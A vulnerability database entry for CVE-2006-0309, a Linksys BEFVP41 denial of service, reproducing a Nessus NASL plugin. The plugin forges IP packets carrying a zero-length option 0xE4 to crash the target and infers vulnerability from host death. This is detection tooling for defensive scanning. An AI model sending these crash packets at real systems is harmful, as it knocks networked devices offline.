Vulnerabilities > CVE-2006-0309 - Remote Denial Of Service vulnerability in Linksys Befvp41 1.01.04

047910
CVSS 4.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
SINGLE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
linksys
nessus

Summary

Linksys BEFVP41 VPN Router 2.0 with firmware 1.01.04 allows remote attackers on the local network to cause a denial of service via IP packets with a null IP option length.

Vulnerable Configurations

Part Description Count
Hardware
Linksys
1

Nessus

NASL family: Denial of Service
NASL id: 3COM_RAS_CRASH.NASL
description: It was possible to crash the remote host by sending a specially crafted IP packet with a null length for IP option #0xE4. An attacker may use this flaw to prevent the remote host from accomplishing its job properly.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 11475
published: 2003-03-25
reporter: This script is Copyright (C) 2003-2019 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/11475
title: 3com RAS 1500 / Wyse Winterm Malformed Packet Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#
# THIS SCRIPT WAS NOT TESTED !
# (will only work with Nessus >= 2.0.2 though, because of a bug in insert_ip_option())
#
# Ref:
#
# Date: Mon, 24 Mar 2003 16:56:21 +0100 (CET)
# From: Piotr Chytla <[email protected]>
# Reply-To: iSEC Security Research <[email protected]>
# To: [email protected], <[email protected]>
#
# Josh Zlatin-Amishav has also discovered that this affects
# Wyse Winterm 1125SE thin client devices:
#    http://www.securityfocus.com/archive/1/407903/30/0/threaded

include("compat.inc");

# Metadata registration. When `description` is set, the script only declares
# its identity, references, scoring and scheduling constraints, then exits
# (see the exit(0) at the end of this block) before any packet is forged.
if (description)
{
 script_id(11475);
 script_version("1.21");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 # Two CVE ids and two Bugtraq ids are attached to this one check, so a
 # finding from this plugin does not by itself say which product is affected.
 script_cve_id("CVE-2005-2577", "CVE-2006-0309");
 script_bugtraq_id(7175, 14536);

 script_name(english:"3com RAS 1500 / Wyse Winterm Malformed Packet Remote DoS");
 script_summary(english:"Crashes a 3com_RAS_1500");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a remote denial of service attack.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote host by sending a specially
crafted IP packet with a null length for IP option #0xE4

An attacker may use this flaw to prevent the remote host from
accomplishing its job properly.");

 script_set_attribute(attribute:"see_also", value:"http://archive.cert.uni-stuttgart.de/bugtraq/2003/03/msg00321.html");

 script_set_attribute(attribute:"solution", value:"The solution is unknown at this time.");
 # CVSS v2 base: network-reachable, low complexity, no authentication,
 # availability impact only (complete).
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 # CVSS v2 temporal: proof-of-concept exploit, report confidence confirmed.
 # NOTE(review): RL:OF normally denotes an official fix, while the solution
 # text above says none is known - confirm which of the two is current.
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2003/03/24");
 script_set_attribute(attribute:"plugin_publication_date", value:"2003/03/25");

 # Marked as a potential (unconfirmed) finding: the test below infers the
 # flaw from loss of host liveness only, not from a version or banner.
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 # ACT_KILL_HOST classifies the plugin as one that may take the target down;
 # scan policies that exclude disruptive categories are expected to skip it.
 script_category(ACT_KILL_HOST);

 script_copyright(english:"This script is Copyright (C) 2003-2019 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");

 # Only scheduled when the "Settings/ParanoidReport" KB key is present.
 script_require_keys("Settings/ParanoidReport");
 exit(0);
}

include("audit.inc");
include("global_settings.inc");

  # Test body: forge an IPv4 packet carrying IP option 0xE4 with a zero
  # length, send it, then decide from host liveness whether it had an effect.

  # The packet built below is IPv4 (ip_v : 4), so IPv6 targets are skipped.
  if ( TARGET_IS_IPV6 ) exit(0);
  # Second gate on top of the required KB key: stop unless the paranoia
  # level is at least 2.
  if (report_paranoia < 2) audit(AUDIT_PARANOID);
  # Paired with end_denial() below; presumably records that the host was
  # reachable before the test - confirm against the NASL library.
  start_denial();

  # Base header: 5-word header length, IPv4, TTL 0xff, protocol number 0xAA,
  # fixed id 1234, source set to the scanning host. The constant id and
  # protocol value make this scanner traffic easy to recognise in captures.
  ip = forge_ip_packet(ip_hl: 5, ip_v : 4, ip_tos : 0,
  ip_len : 44, ip_id:1234, ip_off : 0,
  ip_ttl : 0xff, ip_p:0xAA,
  ip_src : compat::this_host());

  # Adds option code 0xE4 with length 0 - the "null length" option named in
  # the plugin description - then appends a 20-byte filler payload.
  # NOTE(review): ip_len is fixed at 44 before the option and payload are
  # added, and whether insert_ip_options() adjusts ip_hl/ip_len is not visible
  # here; the header marks the script as untested, so a negative result
  # should not be read as proof that the device is unaffected.
  ipo = insert_ip_options(ip:ip, code:0xE4, length:0, value:raw_string(0x00, 0x00));
  ipo += string("ABCDEFGHIJKLMNOPRSTU");
  # `x 10` repeats the send ten times; pcap_active:FALSE presumably means no
  # reply is captured for these packets.
  send_packet(ipo, pcap_active:FALSE) x 10;
  # Wait five seconds before the liveness re-check.
  sleep(5);
  alive = end_denial();
  # The verdict rests solely on the host no longer answering: anything else
  # that makes it unreachable in this window produces the same report, which
  # is consistent with the "potential_vulnerability" attribute in the metadata.
  if(!alive){
    # Reported against port 0; "Host/dead" is stored in the KB.
    security_hole(0);
    set_kb_item(name:"Host/dead", value:TRUE);
  }